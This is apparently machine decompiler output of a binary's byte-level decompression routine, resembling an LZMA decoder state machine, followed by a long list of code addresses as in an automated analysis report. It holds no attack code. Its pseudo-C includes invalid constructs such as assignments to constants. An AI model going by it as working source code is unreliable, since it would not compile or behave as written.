												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                      0x00000000
                                                                      0x004068ee
                                                                      0x004068ee
                                                                      0x004068f2
                                                                      0x00406917
                                                                      0x00406921
                                                                      0x00000000
                                                                      0x004068f4
                                                                      0x004068f4
                                                                      0x004068f7
                                                                      0x004068fb
                                                                      0x004068fe
                                                                      0x00406901
                                                                      0x00406905
                                                                      0x00406905
                                                                      0x00406908
                                                                      0x004069e2
                                                                      0x004069e2
                                                                      0x004069e9
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00406a20
                                                                      0x00406a24
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8c
                                                                      0x00406a8d
                                                                      0x00406a8f
                                                                      0x00406a91
                                                                      0x00406a94
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x00406145
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00000000
                                                                      0x00406156
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040615f
                                                                      0x00406162
                                                                      0x00406165
                                                                      0x00406169
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040616f
                                                                      0x00406172
                                                                      0x00406174
                                                                      0x00406175
                                                                      0x00406178
                                                                      0x0040617a
                                                                      0x0040617b
                                                                      0x0040617d
                                                                      0x00406180
                                                                      0x00406185
                                                                      0x0040618a
                                                                      0x00406193
                                                                      0x004061a6
                                                                      0x004061a9
                                                                      0x004061b5
                                                                      0x004061dd
                                                                      0x004061df
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061e1
                                                                      0x004061e4
                                                                      0x004061e5
                                                                      0x004061e5
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061bb
                                                                      0x004061c0
                                                                      0x004061c0
                                                                      0x004061c9
                                                                      0x004061d1
                                                                      0x004061d4
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061f7
                                                                      0x004061f7
                                                                      0x004061fb
                                                                      0x00406aa7
                                                                      0x00000000
                                                                      0x00406aa7
                                                                      0x00406204
                                                                      0x00406214
                                                                      0x00406217
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621d
                                                                      0x00406221
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406223
                                                                      0x00406229
                                                                      0x00406253
                                                                      0x00406259
                                                                      0x00406260
                                                                      0x00000000
                                                                      0x00406260
                                                                      0x0040622f
                                                                      0x00406232
                                                                      0x00406237
                                                                      0x00406237
                                                                      0x00406242
                                                                      0x0040624a
                                                                      0x0040624d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406292
                                                                      0x00406298
                                                                      0x0040629b
                                                                      0x004062a8
                                                                      0x004062b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406267
                                                                      0x00406267
                                                                      0x0040626b
                                                                      0x00406ab6
                                                                      0x00000000
                                                                      0x00406ab6
                                                                      0x00406277
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406285
                                                                      0x00406288
                                                                      0x0040628b
                                                                      0x00406290
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406975
                                                                      0x00406979
                                                                      0x00406b28
                                                                      0x00000000
                                                                      0x00406b28
                                                                      0x00406985
                                                                      0x0040698c
                                                                      0x00406994
                                                                      0x00406997
                                                                      0x0040699a
                                                                      0x0040699a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062b8
                                                                      0x004062ba
                                                                      0x004062bd
                                                                      0x0040632e
                                                                      0x00406331
                                                                      0x00406334
                                                                      0x0040633b
                                                                      0x00406345
                                                                      0x00000000
                                                                      0x00406345
                                                                      0x004062bf
                                                                      0x004062c3
                                                                      0x004062c6
                                                                      0x004062c8
                                                                      0x004062cb
                                                                      0x004062ce
                                                                      0x004062d0
                                                                      0x004062d3
                                                                      0x004062d5
                                                                      0x004062da
                                                                      0x004062dd
                                                                      0x004062e0
                                                                      0x004062e4
                                                                      0x004062eb
                                                                      0x004062ee
                                                                      0x004062f5
                                                                      0x004062f9
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x00406305
                                                                      0x00406308
                                                                      0x00406326
                                                                      0x00406328
                                                                      0x00000000
                                                                      0x0040630a
                                                                      0x0040630a
                                                                      0x0040630d
